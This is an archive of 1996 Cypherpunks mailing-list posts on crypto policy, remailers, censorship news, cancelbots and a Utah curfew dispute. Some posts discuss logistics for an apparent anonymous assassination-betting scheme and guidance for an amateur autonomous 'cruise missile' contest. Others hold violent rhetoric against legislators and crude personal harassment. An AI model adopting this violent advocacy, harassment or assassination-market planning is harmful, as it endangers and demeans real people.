"The Net" that many businesses would > >scream bloody murder, and the government would have MASSIVE trouble with > >it's agenda. > > Yes, that "they'll cut off the Internet!" talk doesn't seem to be very > practical. Society very quickly develops dependency on inventions. Try to > take away their computers and they'd scream; take away their telephone and > it'd be worse! Give Internet another couple of years and 50% of big > business would be severely impacted should it be cut off. Wait five years > and the world would practically stop rotating without Internet. Maybe so. However I suggested that they would more likley outlaw non GAK crypto, anonymous ecash, remailers, PGP, etc. Perhaps I should read your later AP essay in case you have already countered my practicality objections. (Do you have AP on the www somewhere?), We've seen people suggest that you couldn't get away with AP, by claiming that the gambling was legal. (They'd get you for interstate gambling, conspiracy probably other things). So, it seems to me that your only approach is to do the whole thing anonymously. That requires anonymous ecash (payee and payor anonymous). This means that the anonymous ecash bank will be shutdown by the government as soon as it becomes apparent what is going on. Remailer operators are similar soft targets. The best you could do I think is this. Publish a PGP public key, and software or specifications for a robust steganographic encoding for AP bets. That would take care of comunication. You still have the ecash problem. What do you suggest? Adam From jimbell at pacifier.com Sun Sep 29 14:35:04 1996 From: jimbell at pacifier.com (jim bell) Date: Mon, 30 Sep 1996 05:35:04 +0800 Subject: GPS and other Dual-use technologies Message-ID: <199609291915.MAA04736@mail.pacifier.com> At 10:34 AM 9/29/96 -0700, Steve Schear wrote: >I used to be an avid RC modeler and have contemplated organizing an >on-going amateur cruise missile contest. The object would be to accurately >deliver various payload weights over courses of various terrain and >distances (perhaps out to a hundred miles or more in the case of Giant >Scale craft). Judging would be based on speed, stealth (noise, IR >emissions and radar cross section) and accuracy. > >Craft are free to use any navigational technology, but must be autonomous >from launch to delivery. To aid navigation I was considering the design of >a substitute differential GPS beacon functionally interchangable with those >offered by the USCG. My device would work on a different frequency, >possibly using very wideband direct sequence spread spectrum (for low >probability of intercept/detection) and be actuated by the missile as it >neared the target in order to refine its position. The data standard for differential corrections is called "RTCM-104", and it's the signal you input into differential-capable GPS receivers. Boxes to generate RTCM-104 are probably relatively cheap, primarily needing a multi-channel GPS receiver and another processor for coding. Differential corrections can, of course, be transmitted on any frequency you'd like, including frequency-hopping if you're really concerned about intercept. (which you won't be...) Incidentally, GPS receivers are getting REALLY small these days, particularly for just the module-level products. A size like about 1 inch by 2-inches is pretty close to state-of-the-art. Power consumption is about 3/4 watt. Jim Bell jimbell at pacifier.com From whallen at capitalnet.com Sun Sep 29 14:36:12 1996 From: whallen at capitalnet.com (Wayne H. Allen) Date: Mon, 30 Sep 1996 05:36:12 +0800 Subject: [AP] Afghanistan Message-ID: <199609291924.PAA07683@ginger.capitalnet.com> At 04:10 AM 9/29/96 EDT, Dr.Dimitri Vulis KOTM wrote: >Afghanis publicly hanged their former president, Najibullah [no last name]. >Other countries should follow their example. > >--- > >Dr.Dimitri Vulis KOTM >Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps > > And this would accomplish???? And this has what to do with cryptography?? Wayne H.Allen whallen at capitalnet.com Pgp key at www.capitalnet.com/~whallen From tcmay at got.net Sun Sep 29 14:38:14 1996 From: tcmay at got.net (Timothy C. May) Date: Mon, 30 Sep 1996 05:38:14 +0800 Subject: The Petaflops Boondoggle Computer (was PET_ard) In-Reply-To: <199609291850.LAA03605@mail.pacifier.com> Message-ID: At 11:50 AM -0800 9/29/96, jim bell wrote: >At 10:00 AM 9/29/96 -0800, Timothy C. May wrote: >>(Hoist by their own petards indeed! Don't tell our Russian what petard >>means.) > >Uh, wasn't that the name of the bald captain on Star Trek Next Generation? >You know, "Jean-Luc Petard"? Picard. To keep people out of suspense, "hoist by one's own petard" has one etymology involving a lift-off by gaseous action (though the more family-oriented dictionaries cite a petard as a French rocket of some sort, ignoring the point that the name comes from this same gaseus emission). >Check out an article in about the September issue of Scientific American, >1966, on the subject of the Illiac IV, which was one of the first attempts >at a multiprocessor machine. Originally it was conceived as a 256-processor >unit, at 4 million (floating point?) operations per second per processor >which would have been 1 giga ops per second, but it was eventually built as >a 64-processor unit and turned on in about 1972 or so. The succeeding >factor-of-1000 improvement appears (if the item above is accurate) to have >taken 24 years to accomplish, so it's hard to imagine that the next factor >of 1000 will arrive appreciably sooner than year 2020. I agree. By the way, I knew some of the folks who worked on parts of the Illiac-IV, which was still limping along as late as the late 70s (maybe later). It suffered, as expected, from lack of robust software. Not a huge incentive to write decent software when there's only a single machine! (The Livermore S1 project was yet another such example. So was the CDC Star, of approximately the same vintage as the Illiac.) >Oddly enough, however, we're getting somewhat of an echo of the "big single >processor" phenomenon with the micros. We all know that in supercomputers, >multiprocessors won out over single processors, and mainframes were just >about defeated by microcomputers. > >Yet a look at Intel's pricing for Pentiums shows that they sell a 120-MHz >chip for about $135, while they sell a 200-megahertz version for around $550 >or so. Arithmetic suggests that a person would be far better off with a >4-120-MHz-processor Pentium (cumulative clock rate 480 MHz) than a single, >200-megahertz version. (admittedly, peripheral logic costs will adjust this >a little.) Of course, this would also leave Intel flat on its ass >attempting to compete with AMD, Cyrix, etc, because a somewhat higher speed >per cpu is just about the only advantage they have. Intel is having no problem at all competing with AMD and Cyrix! Both of them are struggling---AMD just announced a layoff, and Cyrix is facing financial troubles. Neither are able to make competitive parts, for reasons I won't go into here, and neither are making the money they'll need to compete in the future with Intel. (Intel has half a dozen billion-dollar wafer fabs, running with extraordinarily high yields--so my sources tell me :-})--and the more money they make, the more factories they build, the more they learn about how to make 0.35 and 0.25 micron chips, etc.) As to pricing, that's mostly a market issue. They charge what the market will bear. As to why a 200 MHz chip sells for 3-4x what a 120 MHz chip sells for, this is a matter of supply-and-demand and _system_ costs. When someone is already spending, say, $2000 on a system, they'll usually pay an extra $500 for a faster version. (Approximately. Again, the market is the ultimate arbiter.) Symmetric multiprocessing is available, but it's often much less hassle to have a single CPU running at 200 MHz than to try games with multiple processors (which means more PCB real estate, more sockets, more of other things). --Tim May We got computers, we're tapping phone lines, I know that that ain't allowed. ---------:---------:---------:---------:---------:---------:---------:---- Timothy C. May | Crypto Anarchy: encryption, digital money, tcmay at got.net 408-728-0152 | anonymous networks, digital pseudonyms, zero W.A.S.T.E.: Corralitos, CA | knowledge, reputations, information markets, Higher Power: 2^1,257,787-1 | black markets, collapse of governments. "National borders aren't even speed bumps on the information superhighway." From tcmay at got.net Sun Sep 29 14:54:39 1996 From: tcmay at got.net (Timothy C. May) Date: Mon, 30 Sep 1996 05:54:39 +0800 Subject: Key-Escrow In-Reply-To: <960929141327_113858214@emout06.mail.aol.com> Message-ID: At 2:13 PM -0400 9/29/96, Scottauge at aol.com wrote: >I have a question. > >There seems to be a lot of excitement over the key escrow stuff da gubermint >is trying to install. > >Couldn't one burn off maybe 10 ** 200 keys and say, hey gubermint dude, these >are like, gonna be my keys. This has been discussed many times, even very recently. You don't think key registration will be _free_, do you? Not many licenses are. (Ignoring the issue of 10^200 being a lot more than there are particles in the Universe, now estimated to be 10^75 elementary particles.) --Tim May We got computers, we're tapping phone lines, I know that that ain't allowed. ---------:---------:---------:---------:---------:---------:---------:---- Timothy C. May | Crypto Anarchy: encryption, digital money, tcmay at got.net 408-728-0152 | anonymous networks, digital pseudonyms, zero W.A.S.T.E.: Corralitos, CA | knowledge, reputations, information markets, Higher Power: 2^1,257,787-1 | black markets, collapse of governments. "National borders aren't even speed bumps on the information superhighway." From Ryan.Russell at sybase.com Sun Sep 29 15:02:49 1996 From: Ryan.Russell at sybase.com (Ryan Russell/SYBASE) Date: Mon, 30 Sep 1996 06:02:49 +0800 Subject: Utah as a Religious Police State Message-ID: <9609291929.AA04064@notesgw2.sybase.com> I guess that depends on your definition of liberty. The Mormons originally moved there to have a place to practice their religion, and have freedom from persecution. I suppose one could extend that to wanting a place to have the freedom to have a set of rules consistant with their beliefs. Should that include freedom from interferance from folks such as yourself who want to change their rules, even though you're not presently effected? Ryan ---------- Previous Message ---------- To: cypherpunks cc: From: tcmay @ got.net ("Timothy C. May") @ smtp Date: 09/28/96 10:35:42 PM Subject: Utah as a Religious Police State Hey, Attila, let me know where you folks live...I may want to move there! At 2:56 AM +0000 9/29/96, attila wrote: > the population base is changing with an influx of non-Mormons > in town, so R rated are showing up at the theatres and video > rentals in town. Just so long as my DSS dish still works in Utah--hey, I'll invite all the jack Mormons over for tomorrow night's showing of "Inside Janine," on the "Playboy Channel." (The "Playboy Channel" is kind of tame by video rental standards, but more crotch shots than we used to see a couple of years ago.) > the police visible prescence is effective --a force of 50+ for > a population base < 25,000, plus the county sherrif cars and the > state police. Curfew is 10pm weekdays for minors --and they > enforce it, big time. midnight Fri/Sat. They enforce the "curfew" big time? Looks like some Mormon pigs need to be zapped. (My kids don't cotton to no cop telling them when they can be out in public and when they can't. Any cop who tries to stop my kids from being out has earned severe retaliation. Any councilmember or state legislator who voted for such a curfew needs to be hog-tied, covered with tar, then torched.) I guess this is why I wouldn't last very long in Mormon Country. A fascist encampment, it sounds like. (I have no problem with Mormons, or Catholics, or Muslims, or Satanists keeping _their own_ children indoors after 7, or 5, or whatever their Holy Hour or Curfew Hour is, but no fucking religious nuts are going to tell _me_ when _my_ children must be indoors. I determine where my children may be, and I don't need the State's permission for them to be out. I would think anyone with an iota of libertarian sentiment would understand this.) > ...idle hands are the devil's workshop. you want good solid > kids, you start from the gate and keep 'em busy: home, neighbors, > school, church, etc. Do Utah's cops also enforce this law, too? > they do not date until they are 16 --in groups. boys and > girls --the same rules. With the Utah State Police enforcing this "dating curfew"? (I may sound harsh here, but "curfew" means one and only one thing to me: somebody restricting my freedom of those of my children to be a public place. Should one of my children be picked up by cops for doing nothing illegal, save for being "out past curfew," I'd consider violent response to be justified. It sounds to me--not that I ever thought otherwise--that Utah is not a land that favors liberty.) --Tim May We got computers, we're tapping phone lines, I know that that ain't allowed. ---------:---------:---------:---------:---------:---------:---------:---- Timothy C. May | Crypto Anarchy: encryption, digital money, tcmay at got.net 408-728-0152 | anonymous networks, digital pseudonyms, zero W.A.S.T.E.: Corralitos, CA | knowledge, reputations, information markets, Higher Power: 2^1,257,787-1 | black markets, collapse of governments. "National borders aren't even speed bumps on the information superhighway." From bmcarpenter at trevecca.edu Sun Sep 29 15:27:12 1996 From: bmcarpenter at trevecca.edu (Myers W. Carpenter) Date: Mon, 30 Sep 1996 06:27:12 +0800 Subject: Making Remailers Widespread In-Reply-To: <199609290623.XAA25627@dfw-ix3.ix.netcom.com> Message-ID: At 12:23 AM -0600 on 9/29/96, Bill Stewart wrote: > One way to do that is to parse Raph's list appropriately (and check > signatures on that); another is to have some centralized (sigh) DNS server > do a round-robin distribution so that random.remailer.net picks a > random known-good remailer to deliver through, perhaps also delivering a PGP > key. Add another level: have a Random1.remailer.net thru random800.remailer.net. You just then have premail or something pick one at random. Hey, why not? anyway... myers From dustman at athensnet.com Sun Sep 29 15:30:14 1996 From: dustman at athensnet.com (Dustbin Freedom Remailer) Date: Mon, 30 Sep 1996 06:30:14 +0800 Subject: Transforming variable-length to fixed keys In-Reply-To: <84399947820692@cs26.cs.auckland.ac.nz> Message-ID: <199609291955.PAA06871@godzilla.athensnet.com> > [1] There's a story from IBM when they were testing a new IBM-internal > encryption system for long-haul telecoms applications. They were > playing around with bouncing encrypted transmissions off an IBM-owned > satellite when they were contacted by the NSA who said "You're not using > DES. Stop it". This story has already been debunked on this mailing list, I believe. From dweightman at radix.net Sun Sep 29 15:33:04 1996 From: dweightman at radix.net (Donald Weightman) Date: Mon, 30 Sep 1996 06:33:04 +0800 Subject: Internet 'terrorism' newsclips [CYPHER, but news] Message-ID: <199609292003.QAA08843@news1.radix.net> >From today's PARADE magazine, that valuable source for insight into the popular heart and mind, "explaining" why "we" haven't been able to catch Iranian terrorists: >Thanks to the highly sophisticated surveillance capabilities, American >intelligence agencies have intercepted enough telephone messages from Iran, >ordering acts of terrorism, that Iran's terrorist network stopped using the >phone. Reportedly this has caused them to start using codes on the Internet >that are "practically" impossible to track and isolate. >"Just when we thought we had outsmarted them, they caught on and started >using codes on the Internet", an expert in international terrorrism tells >us. "There's so much crazy srewball stuff on the Internet that it's >practically impossible to track down and isolate the terrorists. No >government can analyze those millions and millions of messages." And from another piece of hard-hitting quote-the-official-source journalism in PARADE, "A New Worry: Terrorism in Cyberspace" >The danger of computer-based "cyper" attacks is second only to that posed by >nuclear arms and other weapons of mass destruction, says CIA's Director, John >Deutch. He expects the threat to grow as we rush to connect the world on the >Internet. >There were more than 250,000 attacks on Department of Defense computers last >year, and 65% were successful. Little is known about who launched them, why, or >what they found. In a recent test, Defense Department "red teams" admit to >intentionally hacking into 18,200 systems, with only 5% of the attacks >detected; only 27% of those attacks were reported. Wonder if the timing of these stories has anything to do with the end of term legislative push on wiretapping. Don Weightman dweightman at radix.net From tcmay at got.net Sun Sep 29 15:48:54 1996 From: tcmay at got.net (Timothy C. May) Date: Mon, 30 Sep 1996 06:48:54 +0800 Subject: Utah as a Religious Police State In-Reply-To: <9609291929.AA04060@notesgw2.sybase.com> Message-ID: (I received this message, with "cypherpunks at sybase.com" as well as "tcmay at sybase.com" (???) cc:ed, so I assume this message was intended for the Cypherpunks list, with some sybase domain name weirdness, or reflector, going on.) At 12:30 PM -0400 9/29/96, Ryan Russell/SYBASE wrote: >I guess that depends on your definition of liberty. The Mormons >originally moved there to have a place to practice their religion, >and have freedom from persecution. I suppose one could extend that >to wanting a place to have the freedom to have a set of rules consistant >with their beliefs. Should that include freedom from interferance from >folks such as yourself who want to change their rules, even though >you're not presently effected? Well, if Utah can rig a way to _secede_ from the Union, your arguments would make more sense. But so long as they are part of these United States, their religious beliefs about when children should be at home cannot supersede basic liberties. (There are some thorny issues about whether _minors_ have full civil rights. But I certainly know that _my_ civil rights are being affected when my children are not allowed on the streets after some hour. If my child is out, this is my problem. I neither want cops to stop-and-detain my children, nor do I want my tax monies to be used to control the behavior of other people's children. Providing no crimes are being committed, curfews for the sake of controlling the behavior of children are no more just than would be a bunch of related behavior control laws, e.g., a ban on comic books, a mandate that all children join after-school youth leagues, etc.) As for "changing their rules," you're missing the point. There are presumably many in Utah who believe as I do (maybe even some Mormons). Those who are living in Utah, as renters, owners, whatever, should not be bound by unconstitutional rules, no matter how many Mormon Elders favor them. Unless the Mormons own _all_ of the property (and maybe not even then, as renters have civil rights), they cannot impose their own notions of morality on the rest of the population, except in compelling cases (e.g., involving the well-known actual _crimes_). I don't mean to pick on Mormons, as other communities have also attempted to impose curfews and other restricitions on the children of others. My ire was raised by Attila's enthusiastic support for laws which no freedom-loving person should be enthusiastic about. Again, I have no problem with Attila restricting his own children's movements, or joining with other parents to control the behavior of their _own_ children, via religious camps, religious schools, youth leagues, etc. He can even make his own kids wear funny uniforms, funny religious hats, whatever. But, for example, tellling _me_ when _my_ children may be out on public streets (doing nothing illegal, neither robbing nor spray-painting nor committing any other real crimes) is unacceptable. I urge Attila (and others) to rethink enthusiastic support for curfews. --Tim May We got computers, we're tapping phone lines, I know that that ain't allowed. ---------:---------:---------:---------:---------:---------:---------:---- Timothy C. May | Crypto Anarchy: encryption, digital money, tcmay at got.net 408-728-0152 | anonymous networks, digital pseudonyms, zero W.A.S.T.E.: Corralitos, CA | knowledge, reputations, information markets, Higher Power: 2^1,257,787-1 | black markets, collapse of governments. "National borders aren't even speed bumps on the information superhighway." From azur at netcom.com Sun Sep 29 16:54:43 1996 From: azur at netcom.com (Steve Schear) Date: Mon, 30 Sep 1996 07:54:43 +0800 Subject: Internet 'terrorism' newsclips [CYPHER, but news] Message-ID: >>There were more than 250,000 attacks on Department of Defense computers last >>year, and 65% were successful. Little is known about who launched them, >why, or >>what they found. In a recent test, Defense Department "red teams" admit to >>intentionally hacking into 18,200 systems, with only 5% of the attacks >>detected; only 27% of those attacks were reported. > >Wonder if the timing of these stories has anything to do with the end of >term legislative push on wiretapping. Quite possibly. The message from this article is clear. Step up investigation and prosecution of illegal government Net activities :-) -- Steve From EALLENSMITH at ocelot.Rutgers.EDU Sun Sep 29 17:07:19 1996 From: EALLENSMITH at ocelot.Rutgers.EDU (E. Allen Smith) Date: Mon, 30 Sep 1996 08:07:19 +0800 Subject: Chinese Censorship Message-ID: <01IA25JKUW7C8WWVXE@mbcl.rutgers.edu> > _________________________________________________________________ > Cisco-Job Fair > _________________________________________________________________ > CHINA RELAXES CONTROLS ON INTERNET ACCOUNTS > __________________________________________________________________________ > Copyright © 1996 Nando.net > Copyright © 1996 Reuter Information Service > SHANGHAI (Sep 25, 1996 08:48 a.m. EDT) - China has removed limits on > the country's number of Internet accounts following the recent > installation of safety controls on the computer network, a senior > Shanghai telecommunications official said on Wednesday. Safety controls... nice euphemism, similar to "key recovery". > "Some time ago, our security arrangements were incomplete and there > was a problem with pornographic and politically unacceptable > material," said Zhang Weihua, vice-president of the Shanghai Post and > Telecommunications Administration. [...] > Zhang said access to sites on the Internet containing pornographic or > politically unacceptable material had been restricted, adding, "This > material is restricted all over the world." > He declined to give details of the security controls placed on the > servers, saying he was only responsible for the technical side of the > service. > But Zhang did say he was unaware of any restrictions on access to > major international news sites through China's Internet servers. > Foreign reports have suggested that China has cut off access to such > news sites. Analysts say that China is concerned over development of > public computer networks and their use by people opposed to communist > rule or communist policies. [...] > Zhang said for "security" reasons there was a need to control > information and discussion on the Internet and related bulletin board > services. > "But surveys done on the usage and interests of people in China with > Internet access indicate that virtually all the material they wanted > to look at is domestic," he said. Due to language differences, I would guess. > China's key Internet Service Provider (ISP) selling access accounts is > Chinanet, controlled by the Post and Telecommunications Bureau. > Zhang said the bureau took measures earlier this year to control > unauthorised activities of other access providers, including > Shanghai's Fudan University, in order to handle the security issue. > China currently has access points to the Internet in Beijing and > Shanghai. It has no plans to add more, Zhang said. > He said his department was being assisted in building its computer > network by several American-Chinese originally from mainland China who > spent time working with the U.S. space agency NASA. I see.... (grimace) > Copyright © 1996 Nando.net From nobody at cypherpunks.ca Sun Sep 29 17:23:33 1996 From: nobody at cypherpunks.ca (John Anonymous MacDonald) Date: Mon, 30 Sep 1996 08:23:33 +0800 Subject: Does any body know anything about this? Message-ID: <199609292138.OAA27616@abraham.cs.berkeley.edu> Is this just more snakeoil or is this real? <<<<<<<< FORWARDED MESSAGE >>>>>>>> From: Ross Anderson Date: Fri, 20 Sep 1996 09:05:28 +0100 Subject: Seminar in Cryptology and Computer Security *** *** *** *** *** University of Cambridge Computer Laboratory EXTRA SEMINAR SPEAKER: Matt Blaze AT&T Research DATE: Monday 23rd September 1996 at 11.30 am PLACE: Room TP4, Computer Laboratory TITLE: SYMMETRIC-KEY CIPHERS BASED ON HARD PROBLEMS A useful principle in cipher design is to reduce or at least relate closely the cryptanalysis of the cipher to some long-studied problem that is believed to be difficult. Most public-key ciphers follow this principle fairly closely (e.g., RSA is at least similar to factoring). Modern symmetric-key ciphers, on the other hand, can rarely be reduced in this way and so are frequently designed specifically to resist the various known cryptanalytic attacks. In this informal talk, we examine a simple cipher primitive, based on Feistel networks, for which recovery of its internal state given its inputs and outputs is NP-complete. We outline simple and efficient block- and stream- cipher constructions based on this primitive. * * * The regular Michaelmas term seminar series will resume on the 8th October with a series of talks on Tuesday afternoons at 4.15 PM in room TP4, Computer Laboratory, Pembroke Street, Cambridge. A list of speakers will be circulated shortly. * * * From dlv at bwalk.dm.com Sun Sep 29 17:25:25 1996 From: dlv at bwalk.dm.com (Dr.Dimitri Vulis KOTM) Date: Mon, 30 Sep 1996 08:25:25 +0800 Subject: Utah as a Religious Police State In-Reply-To: <9609291929.AA04064@notesgw2.sybase.com> Message-ID: Ryan Russell/SYBASE writes: > I guess that depends on your definition of liberty. The Mormons > originally moved there to have a place to practice their religion, > and have freedom from persecution. I suppose one could extend that > to wanting a place to have the freedom to have a set of rules consistant > with their beliefs. Should that include freedom from interferance from > folks such as yourself who want to change their rules, even though > you're not presently effected? It's worth noting that one of Utah mormons favorite pastimes was to ambush the settlers heading for California, kill them all, and take their property. However the mormons were dealt with much less severely than the local Indians who tried the same tricks. Pity. --- Dr.Dimitri Vulis KOTM Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps From dlv at bwalk.dm.com Sun Sep 29 17:27:04 1996 From: dlv at bwalk.dm.com (Dr.Dimitri Vulis KOTM) Date: Mon, 30 Sep 1996 08:27:04 +0800 Subject: [AP] Afghanistan In-Reply-To: <199609291924.PAA07683@ginger.capitalnet.com> Message-ID: "Wayne H. Allen" writes: > At 04:10 AM 9/29/96 EDT, Dr.Dimitri Vulis KOTM wrote: > >Afghanis publicly hanged their former president, Najibullah [no last name]. > >Other countries should follow their example. > > > > And this would accomplish???? And this has what to do with cryptography?? Nothing, of course - neither do Timmy May's stupid rants, lies, and personal attacks. By the way, your abuse of your native language suggests that you're probably a product of U.S. public education. --- Dr.Dimitri Vulis KOTM Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps From sebago at earthlink.net Sun Sep 29 17:30:22 1996 From: sebago at earthlink.net (Allen Robinson) Date: Mon, 30 Sep 1996 08:30:22 +0800 Subject: earthlink's image Message-ID: <199609292210.PAA14662@andorra.it.earthlink.net> On 28 Sep 96 at 16:09, Back Draft wrote: > Date: Sat, 28 Sep 1996 16:09:20 -0800 > To: cypherpunks at toad.com > From: backdraft at earthlink.net (Back Draft) > desubscribe > Please do not assume that all earthlink users are alike. I've just mailed instructions on how to unsubscribe to "Back Draft." AR #%#%#%#%#%#%#%#%#%#%#%#%#%#%#% "In the end, more than they wanted freedom, they wanted security. When the Athenians finally wanted not to give to society but for society to give to them, when the freedom they wished for was freedom from responsibility, then Athens ceased to be free." - Edward Gibbon ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Allen Robinson.........................sebago at earthlink.net PGP public key FE4A0A75 fingerprint 170FBC1F7609B76F 967F1CC8FCA7A41F From lurker at mail.tcbi.com Sun Sep 29 17:38:02 1996 From: lurker at mail.tcbi.com (Lurker) Date: Mon, 30 Sep 1996 08:38:02 +0800 Subject: newsgoup gateways Message-ID: <2.2.32.19960929223835.006dcfd8@mail.tcbi.com> I was wondering if anyone could point me to some servers that will allow me to post to newsgoupes. I have seen some aroud that use the format: newsgroup at domain and forward the mail to the chosen newsgroup. Thanks From dlv at bwalk.dm.com Sun Sep 29 17:53:34 1996 From: dlv at bwalk.dm.com (Dr.Dimitri Vulis KOTM) Date: Mon, 30 Sep 1996 08:53:34 +0800 Subject: The Petaflops Boondoggle Computer (was PET_ard) In-Reply-To: Message-ID: The pathological liar "Timothy C. May" writes: > At 11:50 AM -0800 9/29/96, jim bell wrote: > >At 10:00 AM 9/29/96 -0800, Timothy C. May wrote: > >>(Hoist by their own petards indeed! Don't tell our Russian what petard > >>means.) > > > >Uh, wasn't that the name of the bald captain on Star Trek Next Generation? > >You know, "Jean-Luc Petard"? > > Picard. To keep people out of suspense, "hoist by one's own petard" has one > etymology involving a lift-off by gaseous action (though the more > family-oriented dictionaries cite a petard as a French rocket of some sort, > ignoring the point that the name comes from this same gaseus emission). OK. Igor, petard is the explosive device that Timmy May likes to stick up his rectum in order to dervie sexual pleasure. He should discuss it on his favorite Usenet newsgroup, alt.sex.masturbation, and not on a crypto-related mailing list. --- Dr.Dimitri Vulis KOTM Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps From EALLENSMITH at ocelot.Rutgers.EDU Sun Sep 29 18:27:03 1996 From: EALLENSMITH at ocelot.Rutgers.EDU (E. Allen Smith) Date: Mon, 30 Sep 1996 09:27:03 +0800 Subject: British Censorship Message-ID: <01IA2577Q5RK8WWVXE@mbcl.rutgers.edu> The actions they claim they will do will, of course, lead to no results whatsoever in many cases... as it should be. The hotline in question sounds like a number as opposed to an email address... pity, we could just bounce all spam to it and ask them to deal with it. > _________________________________________________________________ > Cisco-Job Fair > _________________________________________________________________ > BRITISH GOVERNMENT SETS UP NET PORN FILTER > __________________________________________________________________________ > Copyright © 1996 Nando.net > Copyright © 1996 Reuter Information Service > LONDON (Sep 23, 1996 3:48 p.m. EDT) - The British government Monday > set up a watchdog to try to get pornography off the Internet. > Safety-Net, which is being financed by the industry, will have a > hotline to which callers can report suspected illegal material and > will contact police if necessary. Being financed by the industry = if you're going through a British ISP, you're paying for it whether you like it or not. > It will publish a "legality indicator" or rating for each public > access area on the Internet known as a Usenet news group. The rating > will indicate whether the group normally contains illegal or > pornographic material and what kind. > Internet users can contact the hotline to complain about material > received from anyone via an automatic telephone, mail, e-mail or > facsimile. > Safety-Net operators will try to see where the material came from, > contact the authors and ask them to remove it. They can ask the > relevant service provider to take action and pass details to the > British Police National Criminal Intelligence Service (NCIS). > "We at the Home Office (interior ministry) made it clear to the > Internet providers some time ago that action was needed to deal with > obscene material on the Internet," Home Office Minister Tom Sackville > said. [...] > Science and technology minister Ian Taylor said Safety-Net would act > as a warning system to alert the public. > "As this is an international network, we have to do something to try > to eliminate illegal use of it -- the abuse of the Internet by a few > perverts," he told BBC radio. As this is an international network, this is completely impossible. > "Government and the Internet industry have been working hard to come > up with proposals that can offer real protection to net users while > preserving free speech and recgonizing the value of the net for work, > education and leisure," Taylor added in a statement. Usual government doubletalk.... preserving free speech means no such actions. [...] > Copyright © 1996 Nando.net From EALLENSMITH at ocelot.Rutgers.EDU Sun Sep 29 18:42:14 1996 From: EALLENSMITH at ocelot.Rutgers.EDU (E. Allen Smith) Date: Mon, 30 Sep 1996 09:42:14 +0800 Subject: Cancelbots in the news Message-ID: <01IA25EOA9H08WWVXE@mbcl.rutgers.edu> > _________________________________________________________________ > Centura > _________________________________________________________________ > HATE HACKERS: KILLING DIALOGUE ON THE INTERNET > __________________________________________________________________________ > Copyright © 1996 Nando.net > Copyright © 1996 San Francisco Examiner Note the usual misuse of the term "hacker." > (Sep 28, 1996 02:18 a.m. EDT) -- One or more hackers using racist and > other hate terms have erased tens of thousands of messages used by a > wide variety of political discussion groups on the Internet, exposing > new concerns about the security of the worldwide computer system. > At least one Internet customer -- in Oklahoma -- has been blamed for > some of the more than 30,000 killed messages and has been cut off by > his service provider. > "Obviously, the individual responsible is no longer around here," said > William Brunton, president of Internet Connection of Tulsa, one of > several service providers of Usenet news groups that were victimized > during the weekend. "You can be assured it's not going to happen again > from here." The author really doesn't understand USENET, does he (or she)? Evidently, one of the persons posting the cancels was doing so out of this company. > He said he had turned information over to federal authorities and > could not comment further. > In Washington, D.C., an FBI spokesman declined to confirm whether the > matter was being investigated although it was unclear what, if any, > laws may have been violated. > The messages were deleted from system discussion sites used by gays, > Jewish groups, Muslims, feminists and other politically oriented > groups. > The perpetrator or perpetrators used so-called "cancelbot" software > programs labeled with such phrases as "fagcancel" and "kikecancel." > Besides Brunton's small Oklahoma firm, Internet service providers > whose discussion groups were victimized included industry giants > Netcom Inc. of San Jose, and UU Net Technologies of Falls Church, Va. > Officials of those firms were not available for comment. And operating out of these? Or is it simply that the groups in question are carried by these firms? > While some believed such attacks pose a serious threat to the sanctity > of the Internet -- which is virtually unregulated save for a generally > adhered-to protocol known as "netiquette" -- others were less alarmed. Usual mixup between USENET and the Internet, of course. > "There actually are no laws against that sort of thing," said Jonah > Seiger, policy analyst for the Center for Democracy and Technology in > Washington, D.C. "Obviously, it's sort of annoying." > He said a cancelbot, or a forged cancel message, is "a malicious > vehicle and not good netiquette." [...] > Two years ago, when some immigration lawyers "spammed the net" -- > electronically plastering news groups throughout the Internet with a > single message, an advertisement telling how to get a green card -- > "it was the first time someone figured out you could cancel those > messages," Seiger said. > Since then, phony cancelbots have appeared with some frequency. In one > of the better-known cases, the Church of Scientology used cancelbots > to erase messages from news groups used by some of its members with > whom the church was engaged in a legal battle. > The security of the Internet has also been brought into question > recently after hackers altered home pages operated by the CIA and the > Justice Department. [...] > Copyright © 1996 Nando.net From dlv at bwalk.dm.com Sun Sep 29 18:59:21 1996 From: dlv at bwalk.dm.com (Dr.Dimitri Vulis KOTM) Date: Mon, 30 Sep 1996 09:59:21 +0800 Subject: [SPAM] More fan mail from Timmy "peteur" May In-Reply-To: <844008901.9441.0@fatmans.demon.co.uk> Message-ID: What has Timmy been smoking? ]From paul at fatmans.demon.co.uk Sun Sep 29 19:03:40 1996 ]Received: by bwalk.dm.com (1.65/waf) ] via UUCP; Sun, 29 Sep 96 19:14:06 EDT ] for dlv ]Received: from disperse.demon.co.uk by uu.psi.com (5.65b/4.0.061193-PSI/PSINet) via SMTP; ] id AA25790 for dlv at bwalk.dm.com; Sun, 29 Sep 96 19:03:40 -0400 ]Received: from post.demon.co.uk ([(null)]) by relay-2.mail.demon.net id ac16129; ] 29 Sep 96 15:59 BST ]Received: from fatmans.demon.co.uk ([158.152.120.223]) by relay-3.mail.demon.net ] id aa09441; 29 Sep 96 15:54 BST ]Received: from fatmans.demon.co.uk by fatmans.demon.co.uk with SMTP ] id AA843903697 ; Sat, 28 Sep 96 09:41:37 +0000 ]Comments: Authenticated sender is ]From: paul at fatmans.demon.co.uk ]To: "Dr.Dimitri Vulis KOTM" ]Date: Sat, 28 Sep 1996 09:21:37 +0000 ]Mime-Version: 1.0 ]Content-Type: text/plain; charset=US-ASCII ]Content-Transfer-Encoding: 7BIT ]Subject: Re: Possible subs attack???? ]Priority: normal ]X-Pm-Encryptor: JN-PGP-P, 4 ]X-Mailer: Pegasus Mail for Windows (v2.31) ]Message-Id: <844008901.9441.0 at fatmans.demon.co.uk> ] ]-----BEGIN PGP SIGNED MESSAGE----- ] ] ]> The lying sack of shit Timmy May writes: ] ]> The lying sack of shit Timmy May lies again, as usual. ] ]Fuck you, ] ]I am not Tim May, Check out the return path if you don`t believe me, ]if you still don`t here`s my PGP public key signed by the EFF, they ]don`t sign keys here and there without checking ID`s... ] ]Type Bits/KeyID Date User ID ]pub 1024/5BBFAEB1 1996/07/30 Paul Bradley ] ]- -----BEGIN PGP PUBLIC KEY BLOCK----- ]Version: 2.6.3ia ] 